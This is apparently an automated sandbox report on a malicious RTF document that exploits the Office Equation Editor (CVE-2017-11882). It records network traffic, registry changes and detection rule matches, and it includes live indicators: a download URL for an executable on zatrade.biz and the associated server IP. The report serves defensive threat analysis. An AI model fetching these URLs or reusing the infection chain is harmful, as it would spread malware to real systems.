
Windows Analysis Report
New Order 3118.rtf

Overview

General Information

Sample name: New Order 3118.rtf
Analysis ID: 1416057
MD5: 99a565b1df705062e82bd4d7587c2959
SHA1: 1817b3ef54cf96f71bbb581ef21c37c820c125f0
SHA256: e8fac55896700a6e6505cc1b8d4f98570358c0a1275564d587845cfb5ec47068
Tags: HUNrtf

Detection

Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Document exploit detected (process start blacklist hit)
Installs new ROOT certificates
Office equation editor establishes network connection
Sigma detected: Equation Editor Network Connection
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Detected potential crypto function
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Stores large binary data to the registry
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 2104 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 1096 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • EQNEDT32.EXE (PID: 3264 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
No configs have been found
Source | Rule | Description | Author | Strings
New Order 3118.rtf | INDICATOR_RTF_MalVer_Objects | Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents. | ditekSHen
  • 0x141:$obj2: \objdata
  • 0x157:$obj3: \objupdate
  • 0x119:$obj5: \objautlink

Exploits

Source: Network Connection | Author: Joe Security | Data: DestinationIp: 185.236.228.49, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1096, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

System Summary

Source: Network Connection | Author: Max Altgelt (Nextron Systems) | Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49165, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1096, Protocol: tcp, SourceIp: 185.236.228.49, SourceIsIpv6: false, SourcePort: 80
Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1096, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 2104, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
No Snort rule has matched


AV Detection

Source: New Order 3118.rtf | ReversingLabs: Detection: 36%

Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Network connect: IP: 185.236.228.49 Port: 80
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Network connect: IP: 185.236.228.49 Port: 443
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown | HTTPS traffic detected: 185.236.228.49:443 -> 192.168.2.22:49166 version: TLS 1.2

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Source: global traffic | DNS query: name: zatrade.biz
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 185.236.228.49:80
Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 185.236.228.49:443
Source: global traffic | TCP traffic: 185.236.228.49:80 -> 192.168.2.22:49165
Source: global traffic | TCP traffic: 185.236.228.49:443 -> 192.168.2.22:49166
Source: Joe Sandbox View | ASN Name: EVOLIX-ASFR EVOLIX-ASFR
Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: global traffic | HTTP traffic detected: GET /6nSkW0jqkE1okon.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: zatrade.biz | Connection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{766A1BB3-4D83-4EF3-8227-676B1863F934}.tmp
Source: EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown | DNS traffic detected: queries for: zatrade.biz
Source: EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
Source: EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
Source: EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
Source: EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
Source: EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.entrust.net03
Source: EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
Source: EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: EQNEDT32.EXE, 00000002.00000002.340815170.0000000000569000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://zatrade.biz/6nSkW0jqk
Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.340815170.000000000053F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://zatrade.biz/6nSkW0jqkE1okon.exe
Source: EQNEDT32.EXE, 00000002.00000002.340815170.000000000053F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://zatrade.biz/6nSkW0jqkE1okon.exeW
Source: EQNEDT32.EXE, 00000002.00000002.340815170.000000000053F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://zatrade.biz/6nSkW0jqkE1okon.exej
Source: EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://secure.comodo.com/CPS0
Source: EQNEDT32.EXE, 00000002.00000002.340815170.0000000000569000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://zatrade.biz/
Source: EQNEDT32.EXE, 00000002.00000002.340815170.0000000000569000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://zatrade.biz/6nSkW0jqkE1okon.exe
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown | Network traffic detected: HTTP traffic on port 49166 -> 443
Source: unknown | HTTPS traffic detected: 185.236.228.49:443 -> 192.168.2.22:49166 version: TLS 1.2

System Summary

Source: New Order 3118.rtf, type: SAMPLE | Matched rule: Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents. Author: ditekSHen
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Memory allocated: 770B0000 page execute and read and write
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_0055A7AA 2_2_0055A7AA
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: wow64win.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: wow64cpu.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: msi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: cryptsp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: rpcrtremote.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dwmapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: version.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: secur32.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: winhttp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: webio.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: iphlpapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: winnsi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dnsapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: nlaapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dhcpcsvc6.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dhcpcsvc.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: rasadhlp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: credssp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: ncrypt.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: bcrypt.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: gpapi.dll
Source: New Order 3118.rtf, type: SAMPLE | Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents.
Source: classification engine | Classification label: mal80.expl.winRTF@3/8@1/1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$w Order 3118.rtf
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR5D5B.tmp
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
Source: New Order 3118.rtf | ReversingLabs: Detection: 36%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: New Order 3118.LNK.0.dr | LNK file: ..\..\..\..\..\Desktop\New Order 3118.rtf
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_00548F44 push eax; retf 2_2_00548F61
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_00554F4E push edx; ret 2_2_00554F4F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_00555A03 push ebx; ret 2_2_00555A07
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_00554A02 push esp; ret 2_2_00554A03
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_00554A0A push esp; ret 2_2_00554A0B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_0055773C push esp; ret 2_2_0055773F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_0055783E push esp; ret 2_2_0055783F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_0055772E push esp; ret 2_2_0055772F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_0055782E push esp; ret 2_2_0055782F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_00555EDC push edx; ret 2_2_00555EE3
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005577DE push esp; ret 2_2_005577DF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005479CC push 40005478h; retf 0056h 2_2_005479D1
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005401F4 push eax; retf 2_2_005401F5
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005547F3 push esp; ret 2_2_005547F7
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005577FE push esp; ret 2_2_005577FF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_00555CFB push edx; ret 2_2_00555CFF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005464E4 push ebp; iretd 2_2_005464E5
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005577EE push esp; ret 2_2_005577EF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_00557798 push esp; ret 2_2_0055779F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_0055778C push esp; ret 2_2_0055778F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_00554FB6 push ebx; ret 2_2_00554FB7
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005577BE push esp; ret 2_2_005577BF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_00554FAE push ebx; ret 2_2_00554FAF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005577AE push esp; ret 2_2_005577AF

Persistence and Installation Behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 652 | Thread sleep time: -300000s >= -30000s
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3284 | Thread sleep time: -60000s >= -30000s
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK Matrix (tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact). Techniques flagged for this sample, with the count shown in the matrix cell:

  • Execution: Exploitation for Client Execution (23)
  • Persistence: DLL Side-Loading (1)
  • Privilege Escalation: Process Injection (1)
  • Defense Evasion: Masquerading (1), Modify Registry (1), Virtualization/Sandbox Evasion (1), Process Injection (1), Obfuscated Files or Information (1), Install Root Certificate (1), DLL Side-Loading (1)
  • Discovery: Virtualization/Sandbox Evasion (1), Remote System Discovery (1), File and Directory Discovery (1), System Information Discovery (3)
  • Collection: Archive Collected Data (1)
  • Command and Control: Encrypted Channel (12), Ingress Tool Transfer (2), Non-Application Layer Protocol (2), Application Layer Protocol (13)

No techniques were flagged under Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Exfiltration or Impact.
Source | Detection | Scanner | Label
New Order 3118.rtf | 37% | ReversingLabs | Document-RTF.Exploit.CVE-2017-11882
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe
http://ocsp.entrust.net03 | 0% | URL Reputation | safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
http://ocsp.entrust.net0D | 0% | URL Reputation | safe
http://zatrade.biz/6nSkW0jqk | 0% | Avira URL Cloud | safe
https://zatrade.biz/6nSkW0jqkE1okon.exe | 0% | Avira URL Cloud | safe
http://zatrade.biz/6nSkW0jqkE1okon.exej | 0% | Avira URL Cloud | safe
http://zatrade.biz/6nSkW0jqkE1okon.exeW | 0% | Avira URL Cloud | safe
https://zatrade.biz/ | 0% | Avira URL Cloud | safe
http://zatrade.biz/6nSkW0jqkE1okon.exe | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
zatrade.biz | 185.236.228.49 | true | true | (none) | unknown

Name | Malicious | Antivirus Detection | Reputation
http://zatrade.biz/6nSkW0jqkE1okon.exe | true | Avira URL Cloud: safe | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://zatrade.biz/6nSkW0jqkE1okon.exej | EQNEDT32.EXE, 00000002.00000002.340815170.000000000053F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.entrust.net/server1.crl0 | EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmp | false | (none) | high
http://ocsp.entrust.net03 | EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://zatrade.biz/6nSkW0jqk | EQNEDT32.EXE, 00000002.00000002.340815170.0000000000569000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://zatrade.biz/6nSkW0jqkE1okon.exe | EQNEDT32.EXE, 00000002.00000002.340815170.0000000000569000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.diginotar.nl/cps/pkioverheid0 | EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://zatrade.biz/6nSkW0jqkE1okon.exeW | EQNEDT32.EXE, 00000002.00000002.340815170.000000000053F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.entrust.net0D | EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://zatrade.biz/ | EQNEDT32.EXE, 00000002.00000002.340815170.0000000000569000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://secure.comodo.com/CPS0 | EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmp | false | (none) | high
http://crl.entrust.net/2048ca.crl0 | EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmp | false | (none) | high
IP | Domain | Country | ASN | ASN Name | Malicious
185.236.228.49 | zatrade.biz | Portugal | 197696 | EVOLIX-ASFR | true
          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1416057
          Start date and time:2024-03-26 19:44:06 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 3m 58s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:defaultwindowsofficecookbook.jbs
          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
          Number of analysed new started processes analysed:9
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:New Order 3118.rtf
          Detection:MAL
          Classification:mal80.expl.winRTF@3/8@1/1
          EGA Information:Failed
          HCA Information:Failed
          Cookbook Comments:
          • Found application associated with file extension: .rtf
          • Found Word or Excel or PowerPoint or XPS Viewer
          • Attach to Office via COM
          • Active ActiveX Object
          • Scroll down
          • Close Viewer
          • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, svchost.exe
          • Execution Graph export aborted for target EQNEDT32.EXE, PID 1096 because there are no executed function
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • VT rate limit hit for: New Order 3118.rtf
Time | Type | Description
18:44:49 | API Interceptor | 286x Sleep call for process: EQNEDT32.EXE modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.236.228.49 | New_Order_Inquiry_P.O#20015.pif.exe | malicious | Unknown | 185.236.228.49/Ioeknkifois.vdf
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
EVOLIX-ASFR | MODELO 347.exe | malicious | Remcos | 185.236.228.203
EVOLIX-ASFR | THuGg.exe | malicious | Remcos | 185.236.228.203
EVOLIX-ASFR | MODELO 347.exe | malicious | Remcos | 185.236.228.203
EVOLIX-ASFR | INQUIRY0092709092023.exe | malicious | AveMaria, UACMe | 185.236.228.161
EVOLIX-ASFR | xD0aqsLra5.exe | malicious | LimeRAT | 185.236.228.50
EVOLIX-ASFR | x86.elf | malicious | Unknown | 185.236.228.164
EVOLIX-ASFR | 5AiPT5XcC5.exe | malicious | Metasploit, Meterpreter | 185.236.228.215
EVOLIX-ASFR | New_Order_Inquiry_P.O#20015.pif.exe | malicious | Unknown | 185.236.228.49
EVOLIX-ASFR | http://qx1.org | malicious | Unknown | 185.236.226.57
EVOLIX-ASFR | http://qx1.org | malicious | Unknown | 185.236.226.57
Match | Associated Sample Name / URL | Detection | Threat Name | Context
7dcce5b76c8b17472d024758970a406b | Incident_Report_Harassment_by_Employee.doc | malicious | Unknown | 185.236.228.49
7dcce5b76c8b17472d024758970a406b | #1337.doc | malicious | Unknown | 185.236.228.49
7dcce5b76c8b17472d024758970a406b | 1.xla.xlsx | malicious | Unknown | 185.236.228.49
7dcce5b76c8b17472d024758970a406b | 1.xla.xlsx | malicious | Unknown | 185.236.228.49
7dcce5b76c8b17472d024758970a406b | r29EHJocKX.rtf | malicious | Unknown | 185.236.228.49
7dcce5b76c8b17472d024758970a406b | orden de compra T7849..xla.xlsx | malicious | Unknown | 185.236.228.49
7dcce5b76c8b17472d024758970a406b | orden de compra T7849..xla.xlsx | malicious | Unknown | 185.236.228.49
7dcce5b76c8b17472d024758970a406b | SecuriteInfo.com.Exploit.ShellCode.69.11663.9638.rtf | malicious | Unknown | 185.236.228.49
7dcce5b76c8b17472d024758970a406b | aaaaaa.docx.doc | malicious | Unknown | 185.236.228.49
7dcce5b76c8b17472d024758970a406b | APMR1GTlQS.rtf | malicious | Unknown | 185.236.228.49
          No context
          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
          File Type:HTML document, ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):162
